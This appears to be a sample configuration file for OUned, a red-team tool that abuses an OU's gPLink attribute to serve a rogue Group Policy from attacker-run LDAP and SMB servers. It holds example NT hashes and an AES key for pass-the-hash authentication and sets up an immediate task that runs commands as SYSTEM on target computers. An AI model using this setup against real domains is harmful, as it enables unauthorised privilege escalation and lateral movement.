[GENERAL]
# The Distinguished Name of the target Organizational Unit
ou-dn=OU=SERVERS,DC=corp,DC=com

# Generic domain information
domain=corp.com
dc-fqdn=ad01-dc.corp.com
#dc-ip=192.168.123.10

# User with rights to modify target gPLink attribute
username=anail
#password=Password1
hash=64F12CDDAA88057E06A81B54E73B949B
kerberos=False
ldaps=True

[LDAP]
# Details regarding the account with the LDAP SPN for GPC. Provide NT hash if it is configured for RC4, AES key otherwise
ldap-machine=SCAPY$
#ldap-nt=7facdc498ed1680c4fd1448319a8c04f
ldap-aes=c2e2bee9c44cdbb2be3d438be986e74ccb3d4e6b401e7e3cf6a83225cb841822
ldap-iface=eth0

[SMB]
# SMB mode can be either domain or embedded. 'Domain' means that you want to use the SMB share of another machine in the domain.
# Embedded means that you want to use OUned's embedded SMB server
smb-mode=embedded

# Details regarding the account acting as an SMB server for the GPT.
smb-machine=SCAPY$
smb-ip=192.168.123.20
smb-nt=7facdc498ed1680c4fd1448319a8c04f
smb-share=ouned
smb-iface=eth0

[COMMANDS]
# For commands to be executed, you can provide module files (see https://github.com/synacktiv/GroupPolicyBackdoor/wiki and https://github.com/synacktiv/GroupPolicyBackdoor/tree/master/modules_templates)
# You can specify multiple module files, separated by commas
modules=/home/user/modules/ImmediateTask_computer.ini

# For convenience, you can also alternatively specify a command, command_type (either computer or user) and a command_shell (cmd or powershell).
# This will simply create an immediate task running as SYSTEM
#command=whoami > C:\OUT.txt
#command-type=computer
#command-shell=cmd

